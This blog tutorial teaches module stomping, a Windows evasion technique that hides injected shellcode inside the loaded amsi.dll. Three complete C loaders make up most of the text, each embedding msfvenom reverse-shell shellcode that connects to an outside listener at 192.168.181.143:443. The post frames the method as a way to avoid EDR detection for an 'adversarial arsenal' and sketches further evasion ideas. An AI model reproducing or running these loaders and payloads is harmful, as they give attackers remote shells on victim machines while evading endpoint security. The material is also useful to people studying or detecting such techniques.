Skip to main content

Tradecraft Improvement 2 - Module Stomping

Introduction

In the second installment of the tradecraft improvement series we will be discussing about a very common technique used when running/injecting shellcode in-memory. Most of the time when we directly inject shellcode in-memory of the current process or a remote process, it shows up as an unbacked memory region. That means there is no originating file for that particular memory. This will raise suspicion if the thread memory are being inspected.

There are a lot of techniques available to solve this problem. Most common of them is Module Stomping. In this technique the attacker loads a benign DLL into the current process or a remote process and injects the shellcode into that DLL. As a result when the shellcode is executed the origin will be shown from the loaded benign DLL.

Steps Required to use Module Stomping

  1. First we load a benign DLL from the disk
  2. We get the entry point of the DLL
  3. Using the entry point we choose an arbitrary point inside the DLL where we will be writing our shellcode to
  4. Make sure that the DLL is large enough to hold our shellcode
  5. Execute the shellcode inside the DLL by either creating a new thread or directly executing the shellcode from the pointer

Checking a normal in memory shellcode runner

First we will look at what happens when we inject shellcode in memory of the process directly.

For this we will use a normal shellcode injection code this to test.

#include <stdio.h>
#include <windows.h>
#include <stdlib.h>

typedef LPVOID (WINAPI *VirtualAlloc_t)(
   LPVOID lpAddress,
   SIZE_T dwSize,
   DWORD  flAllocationType,
   DWORD  flProtect
);

typedef HANDLE (WINAPI *CreateThread_t)(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  LPTHREAD_START_ROUTINE  lpStartAddress,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId
);

//msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.181.143 LPORT=443 -f c EXITFUNC=thread
unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";

size_t payloadsize = sizeof(shellcode);

int main()
{
	VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
	CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");

	LPVOID ptr = VirtualAlloc_p(NULL, payloadsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	memcpy(ptr, shellcode, payloadsize);

	//pause to inspect

	getchar();
	HANDLE hThread = CreateThread_p(0, 0, (LPTHREAD_START_ROUTINE)ptr, NULL, 0, 0);

	if (hThread == NULL)
	{
		printf("Error Creating thread\n");
		return -1;
	}
	printf("Thread Created\n");
	getchar();

	WaitForSingleObject(hThread, INFINITE);
	return 0;
}
  • This is a normal shellcode injection which allocates a RWX memory region and then copies the shellcode into that memory region

  • Then it will start a new thread to execute the shellcode

  • Compile this code and run it

  • This shellcode will spawn a reverse shell on our netcat listener

  • Once the code pauses, inspect it using Process Hacker

  • Once the thread is create inspect the process

  • We will see that a strange address is there in the callstack of the thread, which is not backed by any module

  • Furthermore inspecting this strange memory address, we will find our shellcode loaded in a RWX memory region

  • Now our aim is to make sure that the origin of the shellcode looks as if it is from a legit module

Implementing Module Stomping

The following code implements module stomping.

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

typedef LPVOID (WINAPI *VirtualAlloc_t)(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flAllocationType,
  DWORD  flProtect
);

typedef BOOL (WINAPI *VirtualProtect_t)(
 LPVOID lpAddress,
 SIZE_T dwSize,
 DWORD  flNewProtect,
 PDWORD lpflOldProtect
);

typedef HANDLE (WINAPI *CreateThread_t)(
 LPSECURITY_ATTRIBUTES   lpThreadAttributes,
 SIZE_T                  dwStackSize,
 LPTHREAD_START_ROUTINE  lpStartAddress,
 __drv_aliasesMem LPVOID lpParameter,
 DWORD                   dwCreationFlags,
 LPDWORD                 lpThreadId
);

unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";

size_t payloadsize = sizeof(shellcode);

int main()
{
  VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
  VirtualProtect_t VirtualProtect_p = (VirtualProtect_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualProtect");
  CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");

  //Load the library to inject code into
  HMODULE lib = LoadLibraryA("C:\\Windows\\System32\\amsi.dll");

  printf("Address of library : %p\n", lib);
  SetLastError(0);

  if (lib != NULL)
  {
    //Finding a location inside the DLL to write the shellcode to
    PDWORD libPtr = lib + 2*4096;
    printf("Address : %p\n", libPtr);
    DWORD temp = 0;

    //Change memory protection before writing the shellcode    

    VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
    memcpy(libPtr, shellcode, payloadsize);

    //adjust the protection as before
    VirtualProtect_p(libPtr, payloadsize , temp,&temp);
    
    
    //start a new thread
    HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
    if(hThread == NULL)
    {
      printf("Thread not created\n");
    }
  }
  printf("Attach here\n");
  getchar();
  return 0;
}
  • In order to implement module stomping we first need to find a DLL which will be large enough to hold our shellcode and should look benign at the same time.

  • For this reason I have decided to use the amsi.dll (Got the idea from iredteam)

  • This is done using LoadLibraryA

  • Next we select a region inside the module where we can easily write our shellcode

PDWORD libPtr = lib + 2*4096;
  • Then adjust the memory permissions to PAGE_READWRITE so that we are able to copy our shellcode there
VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
  • Use memcpy to copy the shellcode to the selected memory region inside the module
memcpy(libPtr, shellcode, payloadsize);
  • Once the shellcode is copied re-adjust the permissions of that memory region

  • Now use CreateThread API to execute the shellcode in a new thread

  • The start location of the new thread should be the selected location inside the module

HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
  • This will give us a reverse shell on our listener

Executing the payload

  • Compile and the run the code and attach it using x64Dbg

  • Go to the memory region that is displayed by the program

  • We will find our shellcode in that memory region
  • Now checking Process Hacker we will find that there is a new thread originating from amsi.dll

  • This can be confirmed if we follow the memory map in x64Dbg

  • We will see that this memory address is inside the amsi.dll

  • We will also get our reverse shell on our listener

Few scopes of improvement

Even though this technique works just fine, we can still improve upon this

Executing the shellcode in the main thread

  • You must have noticed we use the CreateThread API to create a new thread in order to execute the shellcode
  • Doing so will result in the creation of a new thread which might be under the detection rules of the EDR system that is used
  • A subtle change that we can use to solve this is by using a function pointer.
void (*run)() = (void (*)()) libPtr; run();
  • Here we create a pointer to a function that takes no arguments. This function points to the start address of the shellcode
  • Then we call that function to execute the shellcode
  • Doing so will result in executing the shellcode in the main thread instead of a new thread being created

Our final code should look as follows

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

typedef LPVOID (WINAPI *VirtualAlloc_t)(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flAllocationType,
  DWORD  flProtect
);

typedef BOOL (WINAPI *VirtualProtect_t)(
 LPVOID lpAddress,
 SIZE_T dwSize,
 DWORD  flNewProtect,
 PDWORD lpflOldProtect
);

typedef HANDLE (WINAPI *CreateThread_t)(
 LPSECURITY_ATTRIBUTES   lpThreadAttributes,
 SIZE_T                  dwStackSize,
 LPTHREAD_START_ROUTINE  lpStartAddress,
 __drv_aliasesMem LPVOID lpParameter,
 DWORD                   dwCreationFlags,
 LPDWORD                 lpThreadId
);

unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";

size_t payloadsize = sizeof(shellcode);

int main()
{
  VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
  VirtualProtect_t VirtualProtect_p = (VirtualProtect_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualProtect");
  CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");

  //Load the library to inject code into
  HMODULE lib = LoadLibraryA("C:\\Windows\\System32\\amsi.dll");

  printf("Address of library : %p\n", lib);
  SetLastError(0);

  if (lib != NULL)
  {
    //Finding a location inside the DLL to write the shellcode to
    PDWORD libPtr = lib + 2*4096;
    printf("Address : %p\n", libPtr);
    DWORD temp = 0;

    //Change memory protection before writing the shellcode    

    VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
    memcpy(libPtr, shellcode, payloadsize);

    //adjust the protection as before
    VirtualProtect_p(libPtr, payloadsize , temp,&temp);
    
    
    //start a new thread
	/*
    HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
    if(hThread == NULL)
    {
      printf("Thread not created\n");
    }
	*/
    void (*run)() = (void (*)()) libPtr; run();
  }
  printf("Attach here\n");
  getchar();
  return 0;
}
  • Compile and run the code

  • Here we will see that no new thread is being created, however the main thread has loaded the amsi.dll on the stack

  • This is where the shellcode is getting executed from

  • The main drawback of this approach is that, since the shellcode is getting executed on the main thread, if the shellcode exits, our main process will also stop

  • For some reason if the main thread is killed, the payload will become a zombie process

Complete Thread Stack Spoofing

  • In case of module stomping we are just loading a new module from the disk and writing our shellcode to its memory
  • This might raise some alerts and can be fingerprinted
  • To solve this one can re-write the thread stack for the unbacked memory regions in order to make them look legit.
  • If implemented properly without any errors this can be difficult to catch.

Hunting for code caves inside DLLs

  • If the shellcode is very large, one needs to look for appropriate locations inside the DLL to write the shellcode to
  • Also one needs to check that the loaded DLL is large enough to accommodate the shellcode

Conclusions

This was an introduction to basic module stomping. There are a lot of improvements that can be done to this technique. It is a great technique for one to add to their adversarial arsenal to use against security solutions.

Checkout my source code for this part : https://github.com/dosxuz/TradecraftImrprovement/tree/main/Part-2

Refernces

  1. https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injectionhttps://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection
  2. https://medium.com/@Breadman602/breadman-module-stomping-api-unhooking-using-native-apis-b10df89cc0a2